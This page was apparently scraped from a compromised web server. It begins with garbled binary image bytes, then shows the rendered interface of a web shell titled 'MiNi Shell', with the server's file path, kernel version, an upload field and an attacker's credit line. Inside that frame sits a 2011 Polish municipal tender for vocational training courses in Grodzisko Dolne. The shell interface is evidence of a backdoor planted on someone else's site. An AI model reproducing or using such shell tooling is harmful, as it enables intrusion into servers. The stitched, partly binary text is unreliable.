JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110426/123663-N-2011.html

<p class="kh_header"><b>Grodzisko Dolne: Organizacja i przeprowadzenie szkoleń w ramach projektu systemowego Czas na aktywność w 
Gminie Grodzisko Dolne realizowanego przez Gminę Grodzisko Dolne/Gminny Ośrodek Pomocy 
Społecznej w Grodzisku Dolnym  - współfinansowanego z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 123663 - 2011; data zamieszczenia: 26.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , 37-306 Grodzisko Dolne, woj. podkarpackie, tel. 17 2429134, faks 17 2429134.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń w ramach projektu systemowego Czas na aktywność w 
Gminie Grodzisko Dolne realizowanego przez Gminę Grodzisko Dolne/Gminny Ośrodek Pomocy 
Społecznej w Grodzisku Dolnym  - współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Organizacja i przeprowadzenie szkoleń w ramach projektu Czas na
aktywność w Gminie Grodzisko Dolne  realizowanego przez Gminę Grodzisko Dolne Gminny Ośrodek Pomocy Społecznej w Grodzisku Dolnym  współfinansowanego  z Europejskiego Funduszu Społecznego. Celem głównym projektu jest kompleksowe podniesienie poziomu zdolności do zatrudnienia, aktywności społecznej i zawodowej uczestników projektu poprzez formy aktywnej integracji. Projekt skierowany jest do 12 osób zamieszkałych na terenie Gminy Grodzisko Dolne.
Przedmiot zamówienia obejmuje:

1. Trening kompetencji i umiejętności społecznych wraz z materiałami oraz wyżywieniem.
Miejsce szkolenia: Grodzisko Dolne
Liczba uczestników: 12 osób
Ilość godzin: 40  godzin dydaktycznych. Zajęcia mają być prowadzone przez trenera w formie 
szkolenia/warsztatów.
Instrument ten obejmuje m.in. naukę umiejętności komunikacji interpersonalnej, asertywności, 
powstawania konfliktów i sposobów ich rozwiązywania, mocne i słabe strony, stres - radzenie sobie ze stresem i jego skutkami.
Termin realizacji: czerwiec 2011r.

2. Trening pracy wraz z materiałami oraz wyżywieniem.
Miejsce szkolenia: Grodzisko Dolne
Liczba uczestników: 12 osób
Ilość godzin: 32 godziny dydaktyczne. Zajęcia mają być prowadzone przez trenera (doradcę zawodowego) w formie warsztatów.
Celem warsztatów będzie m.in. dostarczenie wiedzy w zakresie efektywnego poszukiwania 
pracy, dostarczenie wiedzy w zakresie przygotowania i sporządzania podstawowych dokumentów 
aplikacyjnych, skuteczne metody poszukiwania pracy, analiza ofert pracy, autoprezentacja podczas 
rozmowy kwalifikacyjnej itp.
Termin realizacji:  czerwiec 2011r.

3. Doradca zawodowy:  doradztwo -  indywidualne konsultacje  dla 12 osób w ilości 36 godz. (1 godz. =   60 min.)  tj. 3  godz. na osobę. 
Celem doradztwa jest diagnoza  predyspozycji zawodowych i osobowościowych uczestników 
projektu, opracowanie indywidualnego planu działania.
Termin realizacji: lipiec 2011

4. Szkolenie: Profesjonalny sprzedawca z obsługą kas fiskalnych i obsługą komputera oraz                   z fakturowaniem (materiały szkoleniowe oraz wyżywienie)
 Program szkolenia obejmuje: wiedzę o konsumencie, sklep detaliczny, magazyn i ich wyposażenie, marketing handlowy, organizacja pracy w sklepie i magazynie, zaopatrzenie sklepu i magazynu          w towary, technika sprzedaży detalicznej, czynności rachunkowo - kasowe, trening umiejętności sprzedaży i obsługi klienta, obsługa kas fiskalnych, obsługa komputera z systemem operacyjnym MS Windows, wykonywanie operacji fakturowania z zastosowaniem komputera, aspekty sanitarno - higieniczne w zakładach produkcji i obrotu środkami spożywczymi, przepisy BHP i ochrona ppoż. oraz zasady zabezpieczenia towarów w sklepie i magazynach, zapasy magazynowe.
Miejsce szkolenia: Grodzisko Dolne lub Miasto Leżajsk
Liczba uczestników: 2 osoby
Ilość godzin: 120 godzin dydaktycznych
Termin realizacji: sierpień - październik  2011
Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do wykonywania 
zawodu: sprzedawcy, kasjera, handlowca.

5. Szkolenie: Spawanie podstawowe metodą MAG (materiały szkoleniowe oraz wyżywienie)
Miejsce szkolenia: Grodzisko Dolne lub Miasto Leżajsk 
Liczba uczestników: 2 osoby
Ilość godzin: 120 godzin dydaktycznych 
Program szkolenia obejmuje: procesy spajania i pokrewne spawaniu, rysunek techniczny                    w spawalnictwie, materiały podstawowe, materiały dodatkowe, podstawy elektrotechniki, urządzenia   i sprzęt do spawania, technika i technologia spawania, niezgodności spawalnicze, kontrola i badania złączy spawanych, konstrukcje spawane i jakość w spawalnictwie, szkolenie, egzaminowanie, kwalifikowanie, certyfikowanie i uprawnienia spawaczy, przepisy, wytyczne i normy dotyczące spawalnictwa, BHP i ppoż. przy pracach spawalniczych, szkolenie praktyczne - ćwiczenia.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: spawacza.
Termin realizacji: sierpień - październik  2011r.

6. Szkolenie: Kucharz małej gastronomii (materiały szkoleniowe oraz wyżywienie)
Miejsce szkolenia: Grodzisko Dolne lub Miasto Leżajsk
Liczba uczestników: 4 osoby
Ilość godzin: 115 godzin dydaktycznych
Program szkolenia obejmuje: planowanie produkcji, surowce gastronomiczne, maszyny i urządzenia wraz z zasadami BHP przy pracach gastronomicznych, stanowisko pracy, obróbka wstępna surowców, technika sporządzania dań podstawowych, sporządzanie zup, przekąski, desery i napoje, ekspozycja wyrobów kulinarnych.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: kucharza
Termin realizacji: wrzesień - październik 2011 r.

7. Szkolenie: Fryzjer damsko-męski (materiały szkoleniowe oraz wyżywienie)
Miejsce szkolenia: Grodzisko Dolne lub Miasto Leżajsk 
Liczba uczestników: 1 osoba
Ilość godzin: 110 godzin dydaktycznych
Program szkolenia obejmuje: Higiena i bezpieczeństwo pracy, podstawy chemiczne materiałów fryzjerskich, technologie fryzjerskie, elementy stylizacji fryzur, obsługa klienta i poradnictwo.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: fryzjera damsko - męskiego.
Termin realizacji: sierpień - październik  2011 r.

8. Szkolenie: Kelner - barman (materiały szkoleniowe oraz wyżywienie)
Miejsce szkolenia: Grodzisko Dolne lub Miasto Leżajsk
Liczba uczestników: 2 osoby
Ilość godzin: 140 godzin dydaktycznych
Program szkolenia obejmuje: przestrzeganie zasad BHP, ppoż. i sanitarno - higienicznych w sali konsumenckiej, kultura osobista i przestrzeganie etyki zawodowej, komunikowanie się                         z konsumentami, wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej, ekspedycyjnej i w bufecie, bielizna stołowa, zastawa stołowa, przygotowanie poprzedzające obsługę, sporządzanie kart menu, noszenie zastawy, zbieranie brudnych naczyń, serwowanie potraw, obsługiwanie w sali konsumenckiej, sporządzanie deserów lodowych i owocowych, podstawy baristyki, podstawy sommelierstwa, serwowanie napojów bezalkoholowych, podstawowe zagadnienia z zakresu barmaństwa, przygotowanie i serwowanie napojów alkoholowych i cocktaili, barmaństwo klasyczne  w stylu flair.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: kelner - barman
Termin realizacji: sierpień - październik 2011

9. Szkolenie: Podstawy obsługi komputera z dostępem do Internetu oraz obsługą sekretariatu (materiały szkoleniowe oraz wyżywienie)
Miejsce szkolenia: Grodzisko Dolne lub Miasto Leżajsk
Liczba uczestników: 1 osoba
Ilość godziny: 90 godzin dydaktycznych
Program szkolenia obejmuje: użytkowanie komputerów, Edytor tekstu Microsoft WORD, Arkusz kalkulacyjny Microsoft Excel, usługi w sieci Internet, wykazywanie kultury osobistej, utrzymywanie wyglądu i prezencji osobistej, organizacja i utrzymanie estetyki sekretariatu i gabinetu szefa, organizacja pracy biurowej, organizacja biura pod względem BHP i ppoż., sporządzanie korespondencji w sprawach handlowych, osobowych i administracyjnych, obsługa biurowych środków technicznych  i środków łączności, obsługa interesantów, organizacja podróży i spotkań, komputer w sekretariacie.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: sekretarki, pomocy administracyjno - biurowej
Termin realizacji: lipiec - sierpień 2011 r. 

9. Spotkanie promocyjne:  październik  2011 
 Uczestnictwo przedstawiciela Wykonawcy w spotkaniu promocyjnych, podsumowanie i ocena odbytych szkoleń.
     
Zajęcia szkoleniowe mają odbywać się od poniedziałku do piątku. Maksymalna ilość godz. 
dydaktycznych - 8 godz. dziennie zapewniając przynajmniej jedną przerwę na posiłek.
Wykonawca ma przedłożyć program szkoleń, określić formy, 
metody szkolenia/nauki, przewidzianą ilość godzin zajęć teoretycznych i praktycznych.
Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia z uwzględnieniem 
obowiązujących w tym zakresie przepisów prawa.
Wykonawca zapewnia: sale szkoleniowe, sprzęt dydaktyczny, materiały szkoleniowe dla uczestników,
warunki w czasie szkoleń zgodne z przepisami BHP, wyżywienie: ciastka, kawa,
herbata, ciepły posiłek (obiad składających się z 2 dań).
W sali szkoleniowej należy umieścić logo EFS.
Wykonawca pokrywa koszty niezbędnych badań lekarskich uczestników danego szkolenia 
(wyrobienie książeczki zdrowia) jeżeli specyfika kursu tego wymaga, ubezpieczenia uczestników 
szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenie i ze 
szkolenia).
Wykonawca zapewni, że program szkoleń zawodowych, przeprowadzenie szkolenia musi odbyć się 
zgodnie z obowiązującymi przepisami prawa (m.in. Rozporządzenie Ministra Edukacji Narodowej oraz Ministra Pracy i Polityki Socjalnej z dnia 12 października 1993 r. w sprawie zasad warunków 
podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. z 1993 r. Nr 103, 
poz. 472 z późn. zm). 
Szkolenie ma zakończyć się oceną zdobytych umiejętności oraz wydaniem stosownego dokumentu:
certyfikatu, dyplomu lub zaświadczenia o ukończeniu szkolenia zgodnie z obowiązującymi w tym 
zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie 
uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji 
zawodowych w formach pozaszkolnych Dz. U. z 2006 r. Nr 31 poz. 216). 
Wydane certyfikaty muszą zawierać logo Europejskiego Funduszu Społecznego oraz informację, że 
projekt był współfinansowany ze środków EFS.
Wykonawca ma dostarczyć Zamawiającemu pełną dokumentację szkoleń tj. m.in. kserokopie dziennika zajęć edukacyjnych zawierającego tematy zajęć i wymiar godzin oraz listę obecności 
z własnoręcznymi podpisami uczestników szkoleń, potwierdzenia wyżywienia oraz odbioru materiałów szkoleniowych; kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie określonych kwalifikacji, kserokopie rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, kserokopię protokołu egzaminacyjnego w przypadku kursu  kończącego się egzaminem, ankiety oceny szkolenia, informacje końcowe o przebiegu szkolenia wraz  z oceną dokonaną na podstawie ankiet przed rozpoczęciem i po zakończeniu szkolenia.

Wykonawca zapewnia/pokrywa koszt dojazdu uczestników projektu na miejsce szkolenia                  (jedynie w przypadku kiedy szkolenie odbywać się będzie poza terenem Gminy Grodzisko Dolne).
Uwaga: 1 godz. dydaktyczna - 45 min..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzielenieWykonawcy wybranemu w przedmiotowym postępowaniu, zamówień uzupełniających w trybie zamówienia z wolnej ręki, które stanowić będą nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienia te będą dotyczyć przedmiotu zamówienia określonego w niniejszej SIWZ i polegać będą na powtórzeniu tego samego rodzaju zamówień

  80.56.10.00-4.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.53.00.00-8, 80.56.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu(posiadają aktualny wpis do rejestru instytucji szkoleniowych)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże ,że w okresie ostatnich trzech lat przed
upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a
jeżeli okres prowadzenia działalności jest krótszy - wykonał, co najmniej 2 usługi szkolenia 
o wartości, co najmniej 30000 zł każda oraz załączą dokumenty potwierdzające, że te usługi zostały 
wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże, że dysponuje osobami posiadającymi kwalifikacje zawodowe oraz doświadczenie i wykształcenie niezbędne do wykonania przedmiotu zamówienia (psycholog,trener, doradca zawodowy)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz zakresu zamówienia, który będzie realizowany przez Podwykonawców (jeżeli wykonawca przewiduje zaangażowanie podwykonawców do wykonania zamówienia). Kosztorys ofertowy - szczegółową kalkulację.Program szkolenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych zamawiający zastrzega możliwość
dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której
wybrano wykonawcę polegającej na zmianie terminu realizacji zamówienia z przyczyn niezależnych
od Zamawiającego jak również Wykonawcy - z powodu nagłej i znacznej ilości rezygnacji przez
uczestników szkolenia, zmiany kluczowego personelu Wykonawcy - za uprzednią zgodą
zamawiającego wyrażoną na piśmie, jeżeli wynika z przyczyn niezależnych od Wykonawcy (np.
zdarzenia losowe: choroba, wypadek itp.); wynagrodzenia w przypadku zmniejszenia ilości usług
przez Zamawiającego bez zapłaty dodatkowych kwot oraz jeżeli nastąpi zmiana powszechnie
obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
22. Warunki dokonywania zmian postanowień umowy:
1) inicjowanie zmian na wniosek wykonawcy lub zamawiającego,
2) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
3) forma pisemna pod rygorem nieważności w formie aneksu do umów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grodziskodolne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, 37-306 Grodzisko Dolne 134, pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2011 godzina 15:00, miejsce: Gminny Ośrodek Pomocy Społecznej, 37-306 Grodzisko Dolne 134, pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com